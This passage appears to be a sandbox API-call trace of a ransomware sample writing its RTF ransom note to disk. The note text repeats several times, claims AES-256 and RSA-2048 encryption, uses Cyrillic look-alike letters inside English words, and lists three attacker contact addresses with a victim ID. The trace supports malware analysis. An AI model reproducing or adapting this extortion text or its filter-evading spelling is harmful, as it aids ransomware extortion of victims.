\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.894] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.895] CloseHandle (hObject=0x1e4) returned 1 [0064.896] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\bg85_info.rtf")) returned 0xffffffff [0064.896] GetLastError () returned 0x2 [0064.896] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t 